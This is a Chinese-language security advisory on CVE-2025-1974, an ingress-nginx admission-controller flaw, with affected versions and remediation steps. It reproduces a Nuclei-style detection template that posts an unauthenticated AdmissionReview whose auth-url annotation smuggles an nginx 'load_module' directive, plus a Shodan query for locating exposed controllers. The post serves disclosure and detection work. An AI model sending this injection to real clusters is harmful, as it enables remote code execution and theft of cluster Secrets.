Kubernetes CVE-2025-1974 RCE
Kubernetes CVE-2025-1974 RCE
TtTeam 2025-04-21 03:29
Kubernetes 中发现了一个安全问题。在某些情况下,未经身份验证且能够访问 Pod 网络的攻击者可以在 ingress-nginx 控制器上下文中执行任意代码。这可能导致控制器可访问的 Secret 信息泄露。(请注意,在默认安装中,控制器可以访问集群范围内的所有 Secret。)
此问题会影响 ingress-nginx。如果您的集群中未安装 ingress-nginx,则不会受到影响。您可以通过运行“kubectl get pods –all-namespaces –selector app.kubernetes.io/name=ingress-nginx”来检查。
受影响的版本
– < v1.11.0
-
v1.11.0 – 1.11.4
-
v1.12.0
POC
id: CVE-2025-1974
2
3info:
4 name: Ingress-Nginx Controller - Remote Code Execution
5 author: iamnoooob,rootxharsh,pdresearch
6 severity: critical
7 description: |
8 A security issue was discovered in ingress-nginx where the `auth-tls-match-cn` Ingress annotation can be used to inject configuration into nginx. This can lead to arbitrary code execution in the context of the ingress-nginx controller, and disclosure of Secrets accessible to the controller
9 impact: |
10 Vulnerable versions of Ingress-Nginx controller can be exploited to gain unauthorized access to all secrets across namespaces in the Kubernetes cluster, potentially leading to complete cluster takeover.
11 remediation: |
12 Update to one of the following versions: Version 1.12.1 or later / Version 1.11.5 or later
13 reference:
14 - https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
15 - https://projectdiscovery.io/blog/ingressnightmare-unauth-rce-in-ingress-nginx
16 - https://nvd.nist.gov/vuln/detail/CVE-2025-1974
17 classification:
18 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
19 cvss-score: 9.8
20 cwe-id: CWE-653
21 cve-id: CVE-2025-1974
22 metadata:
23 verified: true
24 max-request: 1
25 shodan-query: ssl:"ingress-nginx" port:8443
26 tags: cve,cve2025,cloud,devops,kubernetes,ingress,nginx,k8s
27
28http:
29 - raw:
30 - |
31 POST / HTTP/1.1
32 Host: {{Hostname}}
33 Content-Type: application/json
34
35 {
36 "kind": "AdmissionReview",
37 "apiVersion": "admission.k8s.io/v1",
38 "request": {
39 "uid": "d48aa397-c414-4fb2-a2b0-b28187daf8a6",
40 "kind": {
41 "group": "networking.k8s.io",
42 "version": "v1",
43 "kind": "Ingress"
44 },
45 "resource": {
46 "group": "networking.k8s.io",
47 "version": "v1",
48 "resource": "ingresses"
49 },
50 "requestKind": {
51 "group": "networking.k8s.io",
52 "version": "v1",
53 "kind": "Ingress"
54 },
55 "requestResource": {
56 "group": "networking.k8s.io",
57 "version": "v1",
58 "resource": "ingresses"
59 },
60 "name": "test-{{randstr}}",
61 "namespace": "default",
62 "operation": "CREATE",
63 "userInfo": {
64
65 },
66 "object": {
67 "kind": "Ingress",
68 "apiVersion": "networking.k8s.io/v1",
69 "metadata": {
70 "name": "test-{{randstr}}",
71 "namespace": "default",
72 "creationTimestamp": null,
73 "annotations": {
74 "nginx.ingress.kubernetes.io/auth-url": "http://example.com#;load_module test;\n"
75 }
76 },
77 "spec": {
78 "ingressClassName": "nginx",
79 "rules": [
80 {
81 "host": "{{randstr}}",
82 "http": {
83 "paths": [
84 ]
85 }
86 }
87 ]
88 },
89 "status": {
90 "loadBalancer": {}
91 }
92 },
93 "oldObject": null,
94 "dryRun": true,
95 "options": {
96 "kind": "CreateOptions",
97 "apiVersion": "meta.k8s.io/v1"
98 }
99 }
100 }
101
102 matchers:
103 - type: word
104 part: body
105 words:
106 - 'AdmissionReview'
107 - 'directive is not allowed here'
108 - 'load_module'
109 condition: and
需要采取的措施:必须采取以下步骤来缓解此漏洞:将 ingress-nginx 升级到 v1.11.5、v1.12.1 或任何更高版本。
在应用补丁之前,可以通过禁用 ingress-nginx 的验证准入控制器功能来缓解此问题。